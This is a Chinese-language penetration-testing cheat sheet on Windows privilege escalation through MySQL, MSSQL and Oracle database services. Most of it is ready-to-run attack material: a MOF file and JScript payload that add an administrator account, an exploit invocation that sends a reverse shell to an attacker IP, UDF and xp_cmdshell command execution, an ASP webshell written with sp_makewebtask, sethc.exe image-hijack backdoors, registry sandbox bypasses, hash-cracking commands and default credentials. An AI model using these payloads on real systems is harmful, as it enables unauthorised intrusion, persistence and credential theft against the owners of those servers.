渗透提权 Windows 篇
Windows 提权总结
关于常用命令请看常用命令.md
1. 本地提权
windows 系统被爆出了很多提权漏洞,通常来说及时打补丁就能防止黑客在本地利用漏洞提权。换言之就是没打补丁就能提权,另外 windows 平台上许多软件也被爆出提权漏洞,所以说枚举目标机上打了哪些补丁、操作系统的版本以及安装了哪些软件对于利用漏洞提权来说十分重要。对于有安装杀软服务器要进行免杀。 基本就是分为远程溢出和本地溢出 其中远程溢出如果对方端口不对外开放可以通过代理打过去如 445 端口,本地溢出一般就是使用 exp
一些常用命令:
systemifo 获取系统配置信息 wmic os get caption 获取系统版本 wmic qfe get Description,HotFixID,InstalledOn 枚举安装的补丁 powershell Get-HotFix 利用 powershell 获取安装的补丁 powershell "Get-WmiObject -Class Win32_Product | Select-Object -Property Name" 获取安装的软件
一些常用工具:
https://github.com/rasta-mouse/Sherlock
https://github.com/alpha1ab/CVE-2018-8120
https://github.com/GDSSecurity/Windows-Exploit-Suggester
https://github.com/5z1punch/GetRoot-Tools
https://github.com/xiaoxiaoleoWindows_Privilege_Escalation
https://github.com/SecWiki/windows-kernel-exploits
https://github.com/nixawk/labs
https://github.com/breenmachine/RottenPotatoNG
https://github.com/ohpe/juicy-potato
https://github.com/Kevin-Robertson/Tater
https://github.com/Rootkitsmm/Win10Pcap-Exploit
https://github.com/AlessandroZ/BeRoot
https://github.com/ohpe/juicy-potato
2. 常见服务提权
mysql mssql oracle Ftp vnc postgresql 等等服务
mysql
Mysql 默认端口是 3306 端口,但也可以自定义端口可以通过扫描,查找连接数据库配置文件,netstat -aon,等等查看端口
关于 mysql 提权首先应该是找到密码,这个可以通过数据库配置文件或通过 mysql 目录下的 data\mysql\user.MYD 文件中查看 mysql 用户的 hash 值进行破解
一. MOf 提权
MySQL Root 权限 MOF 方法提权是来自国外 Kingcope 大牛发布的 MySQL Scanner & MySQL Server for Windows Remote SYSTEM Level Exp loithttps://www.exploit-db.com/exploits/23083/ ,简称 mysql 远程提权 0day(MySQL Windows Remote System Level Exploit (Stuxnet technique) 0day)。Windows 管理规范 (WMI) 提供了以下三种方法编译到 WMI 存储库的托管对象格式 (MOF) 文件:
方法 1:运行 MOF 文件指定为命令行参数 Mofcomp.exe 文件。 方法 2:使用 IMofCompiler 接口和 $ CompileFile 方法。 方法 3:拖放到 %SystemRoot%\System32\Wbem\MOF 文件夹的 MOF 文件。
Microsoft 建议您到存储库编译 MOF 文件使用前两种方法。也就是运行 Mofcomp.exe 文件,或使用 IMofCompiler::CompileFile 方法。第三种方法仅为向后兼容性与早期版本的 WMI 提供,并因为此功能可能不会提供在将来的版本后,不应使用。注意使用 MOF 方法提权的前提是当前 Root 帐号可以复制文件到%SystemRoot%\System32\Wbem\MOF 目录下,否则会失败!
该漏洞的利用前提条件是必须具备 mysql 的 root 权限,在 Kingcope 公布的 0day 中公布了一个 pl 利用脚本。
perl mysql_win_remote.pl 192.168.2.100 root "" 192.168.2.150 5555
192.168.2.100 为 mysql 数据库所在服务器,mysql 口令为空,反弹到 192.168.2.150 的 5555 端口上。
2. 生成 nullevt.mof 文件:
将以下代码保存为 nullevt.mof 文件:
#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\\Cimv2";
Name = "filtP2";
Query = "Select \ From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add")";
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};
3.通过 Mysql 查询将文件导入
执行以下查询语句,将上面生成的 nullevt.mof 导入到 c:\windows\system32\wbem\mof\目录下在 windows7 中默认是拒绝访问的。导入后系统会自动运行,执行命令。
selectload_file('C:\\nullevt.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';
4.Msf 直接 mof 提权
Msf 下的 exploit/windows/mysql/mysql_mof 模块提供了直接 Mof 提权,不过该漏洞成功跟操作系统权限和 Mysql 数据库版本有关,执行成功后会直接反弹 shell 到 meterpreter。
use exploit/windows/mysql/mysql_mof set rhost 192.168.157.1 //设置需要提权的远程主机 IP 地址 set rport 3306 //设置 mysql 的远程端口 set password root //设置 mysql 数据库 root 密码 set username root //设置 mysql 用户名 options //查看设置 run 0
5.关于远程连接
要是能够通过网页连接管理(phpmyadmin),则可以修改 host 为%并刷新权限后,则可以通过 msf 等工具远程连接数据库。默认 root 等账号不允许远程连接,除非管理员或者数据库用户自己设置。
方法 1:本地登入 mysql,更改 mysql 数据库里的 user 表里的 host 项,将 localhost 改为%
use mysql; update user set host = '%' where user = 'root'; FLUSH PRIVILEGES ; select host, user from user;
方法 2:直接授权(推荐)
从任何主机上使用 root 用户,密码:you password(你的 root 密码)连接到 mysql 服务器:
mysql -u root -proot GRANT ALL PRIVILEGES ON . TO 'root'@'%' IDENTIFIED BY 'you password' WITH GRANT OPTION; FLUSH PRIVILEGES;
推荐重新增加一个用户,在实际测试过程中发现很多服务器使用 root 配置了多个地址,修改后可能会影响实际系统的运行。在实际测试过程中因此建议新增一个用户,授权所有权限,而不是直接更改 root 配置
二 UDF 提权
udf 提权是利用 mysql 自定义函数功能
UDF 提权条件
(1). Mysql 版本大于 5.1 版本 udf.dll 文件必须放置于 MYSQL 安装目录下的 lib\plugin 文件夹下。
(2). Mysql 版本小于 5.1 版本。udf.dll 文件可放置于 c:\windows\system32,在 windows2000 下放置于 c:\winnt\system32,或者放到盘符的根目录下通过 c:udf.dll 来使用
(3). 掌握的 mysql 数据库的账号有对 mysql 的 insert 和 delete 权限以创建和抛弃函数,一般以 root 账号为佳,具备`root 账号所具备的权限的其它账号也可以
(4). 可以将 udf.dll 写入到相应目录的权限
(5). 在 MYSQL 4.1 以前的版本中,可以将所有的 DLL 文件里面的任何函数都注册到 MYSQL 里面以供 MYSQL 调用。无论这个 DLL 在什么位置,函数的声明是什么样的。
(6). 在 MYSQL 4.1 及以后的版本中,对 UDF 函数进行了限制,只有实现了一个特定接口的函数才可以被成功注册到 MYSQL 中,这样就防止了通过 MYSQL 非法调用系统的 DLL
先获取 mysql 信息
select version();//获取数据库版本 select user();//获取数据库用户 select @@basedir ;//获取安装目录 show variables like '%plugins%';
MYSQL 5.1 以上版本,必须要把 udf.dll 文件放到 MYSQL 安装目录下的 lib\plugin 文件夹下才能创建自定义函数。
该目录默认是不存在的,这就需要我们使用 webshell 找到 MYSQL 的安装目录,并在安装目录下创建 libplugin 文件夹,然后将 udf.dll 文件导出到该目录即可
网上大牛发现利用 NTFS ADS 流来创建文件夹的方法:
select @@basedir; //查找到 mysql 的目录 select 'It is dll' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin::$INDEX_ALLOCATION';//利用 NTFS ADS 创建 plugin 目录
如果 mysql 服务器开启了 secure-file-priv 选项,就只能将文件导出到指定目录下。
可以通过 show variables like ‘%secure%’;查询 secure-file-priv 的值。
使用 # 注释掉 mysql 安装目录下 my.ini 或者 mysql.cnf 中的 secure_file_priv=”c:/tmp”一行,然后重启 mysql 就可以将文件导出到任意目录了
创建函数
create function cmdshell returns string soname "path_dll"
执行命令
select cmdshell('whoami');
删除函数
drop function cmdshell;
关于 udf.dll 可以使用 sqlmap 中或自己编译或直接用 udf.php 等等
sqlmap 直连数据库提权
Sqlmap 直接连接数据库提权,需要有写入权限和 root 账号及密码,命令如下
- 连接数据库
sqlmap -d "mysql://root:root@127.0.0.1:3306/mysql" --os-shell
- 选择操作系统的架构,32 位操作系统选择 1,64 位选择 2.
- 自动上传 udf 或提示 os-shell
- 执行 whomai 命令如果获取系统权限,则表示提权成功
msfudf 提权
use exploit/windows/mysql/mysql_payload options set rhost 192.168.2.1 set rport 3306 set username root set password 123456 exploit
msf 下 udf 提权成功率并不高,跟 windows 操作系统版本,权限和数据库版本有关,特别是 secure-file-priv 选项,如果有该选项基本不会成功
Msf 其它相关漏洞提权
1.Mysql 身份认证漏洞及利用(CVE-2012-2122)
当连接 MariaDB/MySQL 时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是 memcmp() 返回一个非零值,也会使 MySQL 认为两个密码是相同的。
也就是说只要知道用户名,不断尝试就能够直接登入 SQL 数据库。
按照公告说法大约 256 次就能够蒙对一次。
受影响的产品: All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 存在漏洞.
MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 不存在漏洞
MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not 不存在漏洞
auxiliary/scanner/mysql/mysql_authbypass_hashdump exploit/windows/mysql/mysql_yassl_hello exploit/windows/mysql/scrutinizer_upload_exec
mysql 密码破解
cain 工具破解 mysql 密码
使用 UltraEdit-32 编辑器直接打开 user.MYD 文件,打开后使用二进制模式进行查看,在 root 用户后面是一串字符串,选中这些字符串将其复制到记事本中,这些字符串即为用户加密值,例如 506D1427F6F61696B4501445C90624897266DAE3。
注意:
- root 后面的“”不要复制到字符串中。
- 在有些情况下需要往后面看看,否则得到的不是完整的 MYSQLSHA1 密码,总之其正确的密码位数是 40 位。
安装 cain 工具,使用 cracker,右键单击“Add tolist”将 Mysql Hashes 值加入到破解列表中,使用软件中的字典、暴力破解等方式来进行暴力破解。
网站在线密码破解
cmd5.com
www.somd5.com
https://www.mysql-password.com/
oclhash 破解
hashcat 支持很多种破解算法,免费开源软件,官方网站 https://hashcat.net/hashcat
破解命令:
hashcat64.exe -m 200myql.hashpass.dict // 破解 MySQL323 类型
hashcat64.exe -m 300myql.hashpass.dict // 破解 MySQL4.1/MySQL5 类型
John the Ripper password cracker
John the Ripper 下载地址: http://www.openwall.com/john/h/john179w2.zip ,John the Ripper 除了能够破解 linux 外,还能破解多种格式的密码如 linux 登陆密码
Echo 81F5E21E35407D884A6CD4A731AEBFB6AF209E1B>hashes.txt John –format =mysql-sha1 hashes.txt john --list=formats | grep mysql //查看支持 mysql 密码破解的算法
https://github.com/Feng4/-/tree/master/php
https://github.com/v5est0r/Python_FuckMySQL
http://https://github.com/MaYaSeVeN/CVE-2016-6662
https://github.com/firebroo/CVE-2016-6663
mssql(SQLServer)
mssql 提权
常用一点的
exec master..xp_cmdshell "whoami"
但默认情况下 xp_cmdshell 是禁止的可以使用以下命令恢复
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; --开启 xp_cmdshell EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 0;RECONFIGURE; --关闭 xp_cmdshell EXEC sp_configure 'show advanced options', 0;RECONFIGURE; --关闭 show advanced options(关闭高级选项)
如果 xp_cmdshell 被删除,可以重新加载
dbcc addextendedproc("xp_cmdshell","xplog70.dll")
如果 xplog70.dll 文件被删可以尝试上传 xplog70.dll 进行恢复,恢复语句:
Exec master.dbo.sp_addextendedproc 'xp_cmdshell','D:\\xplog70.dll'
2.SP_OACREATE
当 xp_cmdshell 删除以后,也可以使用 SP_OACreate。
首先要打开组件:
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE; --开启 exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',0;RECONFIGURE; --关毕 EXEC sp_configure 'show advanced options', 0;RECONFIGURE; --关闭 show advanced options(关闭高级选项) 如果还不能运行可能是管理员删除了组件 恢复组件: dbcc addextendedproc("sp_OACreate","odsole70.dll")
常用 sql 语句
sp_OACreate 删除文件
DECLARE @Result int DECLARE @FSO_Token int EXEC @Result = sp_OACreate 'Scripting.FileSystemObject', @FSO_Token OUTPUT EXEC @Result = sp_OAMethod @FSO_Token, 'DeleteFile', NULL, 'C:\1.txt' EXEC @Result = sp_OADestroy @FSO_Token
sp_OACreate 复制文件
declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';
sp_OACreate 移动文件
declare @aa int exec sp_oacreate 'scripting.filesystemobject', @aa out exec sp_oamethod @aa, 'moveFile',null,'c:\temp\ipmi.log', 'c:\temp\ipmi1.log';
sp_OACreate 加管理员用户
DECLARE @js int EXEC sp_OACreate 'ScriptControl',@js OUT EXEC sp_OASetProperty @js, 'Language', 'JavaScript' EXEC sp_OAMethod @js, 'Eval', NULL, 'var o=new ActiveXObject("Shell.Users");z=o.create("user");z.changePassword("pass","");z.setting("AccountType")=3;'
3.sp_makewebtask
开启和关闭
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Web Assistant Procedures',1;RECONFIGURE; --开启 exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Web Assistant Procedures',0;RECONFIGURE; --关毕 EXEC sp_configure 'show advanced options', 0;RECONFIGURE; --关闭 show advanced options(关闭高级选项)
写文件
exec sp_makewebtask 'c:\www\testwr.asp','select''<%25execute(request("ok"))%25>'' ';
https://docs.microsoft.com/zh-cn/previous-versions/sql/sql-server-2005/ms175576(v=sql.90)
这里我配置 Web Assistant Procedures 失败(也可能是我本地环境的问题)
命令执行
wscript.shell
use master declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',null,'cmd /c whoami > C:\1.txt'
没有回显
shell.Application
declare @o int exec sp_oacreate 'Shell.Application',@o out exec sp_oamethod @o, 'ShellExecute',null,'cmd.exe','cmd /c net user >C:\1.txt','C:\windows\sytsem32\','','1';
这里我在 sql server 2008 windows10 上启动程序成功但并没有生成 1.txt 可能是没有执行命令行
exec sp_oamethod @o, 'ShellExecute',null,'user.vbs','','c:\','','1';
沙盒命令执行
利用 jet.oledb
执行系统命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c whoami")')
默认不行
关闭系统沙盒模式,它在注册表的位置是: HKEY_LOCAL_MACHINE\Software\Microsoft\Jet\4.0\Engine\SandBoxMode
默认键值为 3
,即只在 Access
的模式下开启沙盒模式,对应的键值是
0
:在任何所有者中禁止启用安全模式1
:为仅在允许范围内2
:必须在 access 模式下3
:完全开启
将其设置为 0 就可以关闭系统沙盒模式了
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0
然后利用 jet.oledb
执行系统命令 whoami:
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c whoami >C:\1.txt")')
无回显
注册表映像劫持
先恢复注册表的存储过程
exec sp_addextendedproc xp_regwrite,'xpstar.dll'
映像劫持
exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_SZ','c:\windows\system32\cmd.exe'
直接执行不行要 16 进制编码
exec xp_regwrite 0x484b45595f4c4f43414c5f4d414348494e45,0x534f4654574152455c4d6963726f736f66745c57696e646f7773204e545c43757272656e7456657273696f6e5c496d6167652046696c6520457865637574696f6e204f7074696f6e735c73657468632e657865,0x6465627567676572,0x5245475f535a,'c:\\windows\\system32\\taskmgr.exe
sp_oacreate
declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe'; declare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';
SQL Server CLR
https://xz.aliyun.com/t/248#toc-7
Xp_availablemedia 显示机器上有用的驱动器 xp_enumgroups 列出当前系统的使用群组及其说明 Xp_dirtree 允许获得一个目录树 Xp_enumdsn 列举服务器上的 ODBC 数据源 Xp_loginconfig 获取服务器安全信息 Xp_makecab 允许用户在服务器上创建一个压缩文件 Xp_ntsec_enumdomains 列举服务器可以进入的域 Xp_terminate_process 提供进程的进程 ID,终止此进程 xp_servicecontrol 允许用户启动,停止服务 xp_regread 存储过程修改注册表 xp_getfiledetails 获取某文件的相关属性 xp_cmdshell 执行命令
判断组件是否存在
SELECT count(*) FROM master.dbo.sysobjects WHERE xtype='x' AND name='xp_cmdshell'
恢复 sp_addextendedproc
Use master create procedure sp_addextendedproc --- 1996/08/30 20:13 @functname nvarchar(517),/* (owner.)name of function to call */ @dllname varchar(255)/* name of DLL containing function */ as set implicit_transactions off if @@trancount > 0 begin raiserror(15002,-1,-1,'sp_addextendedproc') return (1) end dbcc addextendedproc( @functname, @dllname) return (0) -- sp_addextendedproc
sp_addextendedproc 恢复各种扩展
EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll' EXEC sp_addextendedproc xp_enumgroups ,@dllname ='xplog70.dll' EXEC sp_addextendedproc xp_loginconfig ,@dllname ='xplog70.dll' EXEC sp_addextendedproc xp_enumerrorlogs ,@dllname ='xpstar.dll' EXEC sp_addextendedproc xp_getfiledetails ,@dllname ='xpstar.dll' EXEC sp_addextendedproc Sp_OACreate ,@dllname ='odsole70.dll' EXEC sp_addextendedproc Sp_OADestroy ,@dllname ='odsole70.dll' EXEC sp_addextendedproc Sp_OAGetErrorInfo ,@dllname ='odsole70.dll' EXEC sp_addextendedproc Sp_OAGetProperty ,@dllname ='odsole70.dll' EXEC sp_addextendedproc Sp_OAMethod ,@dllname ='odsole70.dll' EXEC sp_addextendedproc Sp_OASetProperty ,@dllname ='odsole70.dll' EXEC sp_addextendedproc Sp_OAStop ,@dllname ='odsole70.dll' EXEC sp_addextendedproc xp_regaddmultistring ,@dllname ='xpstar.dll' EXEC sp_addextendedproc xp_regdeletekey ,@dllname ='xpstar.dll' EXEC sp_addextendedproc xp_regdeletevalue ,@dllname ='xpstar.dll' EXEC sp_addextendedproc xp_regenumvalues ,@dllname ='xpstar.dll' EXEC sp_addextendedproc xp_regremovemultistring ,@dllname ='xpstar.dll' EXEC sp_addextendedproc xp_regwrite ,@dllname ='xpstar.dll' EXEC sp_addextendedproc xp_dirtree ,@dllname ='xpstar.dll' EXEC sp_addextendedproc xp_regread ,@dllname ='xpstar.dll' EXEC sp_addextendedproc xp_fixeddrives ,@dllname ='xpstar.dll'
加 sa 账号
exec master.dbo.sp_addlogin username,password exec master.dbo.sp_addsrvrolemember username,sysadmin
https://github.com/NetSPI/PowerUpSQL
sqltools2
oracle
有关于 oracle 数据库利用国内比较少基本都是千篇一律
一些默认账号和密码
Oracle 11g 默认用户名密码
安装 Oracle 时,若没有为下列用户重设密码,则其默认密码如下: https://blog.csdn.net/weinichendian/article/details/78774253
下面介绍其中有几个账户的作用:
- SYS/CHANGE_ON_INSTALL or INTERNAL
系统用户,数据字典所有者,超级权限所有者(SYSDBA)
建议创建后立即修改密码,此用户不能被删除。
SYSTEM/MANAGER
数据库默认管理用户,拥有 DBA 角色权限
建议创建后立即修改密码,此用户不能被删除。
- OUTLN/OUTLN
优化计划的存储大纲用户
建议创建后立即修改密码,此用户不能被删除。 - SCOTT/TIGER, ADAMS/WOOD, JONES/STEEL, CLARK/CLOTH and BLAKE/PAPER.
实验、测试用户,含有例表 EMP 与 DEPT
可以修改密码,用户可以被删除,在产品环境建议删除或锁定。 - HR/HR (Human Resources), OE/OE (Order Entry), SH/SH (Sales History).
实验、测试用户,含有例表 EMPLOYEES 与 DEPARTMENTS
可以修改密码,用户可以被删除,在产品环境建议删除或锁定。 - DBSNMP/DBSNMP
智能代理
可以改变密码,需要放置新密码到 snmp_rw.ora 文件,如果不需要 Intelligent Agents,可以删除。
这时候要找到一组用户名、密码提示被锁,才能进行下一步安装 ORACLE 时,若没有为下列用户重设密码,则其默认密码如下:
- 用户名/密码 登录身份 说明
- sys/change_on_install SYSDBA 或 SYSOPER 不能以 NORMAL 登录,可作为默认的系统管理员
- system/manager SYSDBA 或 NORMAL 不能以 SYSOPER 登录,可作为默认的系统管理员
- sysman/oem_temp sysman 为 oms 的用户名
- scott/tiger NORMAL 普通用户
- aqadm /aqadm SYSDBA 或 NORMAL 高级队列管理员
- Dbsnmp/dbsnmp SYSDBA 或 NORMAL 复制管理员
也可以试一下 oracle system sys admin 等等弱口令,或者在网站的数据库配置文件中寻找数据库连接信息,如果连接信息被编译成 class 可以用 jad 进行反编译查看连接配置。
https://github.com/5z1punch/oracle_java_shell_client
https://github.com/quentinhardy/odat
https://github.com/kimtg/OracleShell
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
上一篇: Windows下载执行文件总结
下一篇: JavaScript 回调的心酸历程
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论